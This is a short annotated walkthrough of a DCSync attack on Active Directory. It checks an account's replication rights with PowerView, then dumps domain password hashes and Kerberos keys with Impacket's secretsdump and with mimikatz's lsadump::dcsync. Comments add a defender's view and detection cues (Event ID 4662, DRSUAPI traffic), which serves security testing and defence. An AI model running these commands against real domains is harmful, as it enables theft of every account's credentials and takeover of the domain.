DCSync

# Step 1 - Using Get-DomainUser (PowerView) to view the account's group membership.
# The select/fl pipeline prints the SAM account name, objectSid, memberOf and
# userAccountControl flags; the objectSid value is what the ACL filter below keys on.
Get-DomainUser -Identity eren  |select samaccountname,objectsid,memberof,useraccountcontrol |fl

# Note SID and domain: record the objectSid printed above and the domain's
# distinguished name. "DC=domain,DC=local", "DOMAIN", "ip" and the SID below are
# placeholders for this write-up; replace them with values from the environment under review.

# Step 2 - Using Get-ObjectAcl to check which replication rights are granted to that SID
# on the domain head object. 'Replication-Get' matches the DS-Replication-Get-Changes*
# extended rights that replication (and therefore DCSync) relies on.
# NOTE(review): both filters use -match, which is a regex/substring test, so a SID that
# is a prefix of another SID also matches; -eq would give an exact comparison.
# Defender's view: these ACEs on the domain object should be held only by domain
# controllers and a short, documented list of accounts - anything else is worth an audit finding.
$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=domain,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

# Step 3 (Impacket, run from a shell, not PowerShell) - secretsdump.py with -just-dc asks the
# DC to replicate directory secrets (NTLM hashes, Kerberos keys) and writes them to files
# prefixed "extracted_hashes"; the password for "eren" is prompted when not supplied.
# Detection: on the DC this surfaces as Security Event ID 4662 whose Properties carry the
# DS-Replication-Get-Changes-All GUID (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2), and on the
# wire as DRSUAPI replication requests (DsGetNCChanges) originating from a non-DC host.
secretsdump.py -outputfile extracted_hashes -just-dc DOMAIN/eren@ip

# Step 4 - Same operation from the mimikatz console: .\mimikatz.exe opens the console and
# lsadump::dcsync requests replication of the named account's secrets from a DC.
# Detection is the same 4662 / DRSUAPI signal as above; the replication request arrives
# from a workstation or user identity rather than a domain controller computer account.
.\mimikatz.exe
lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator
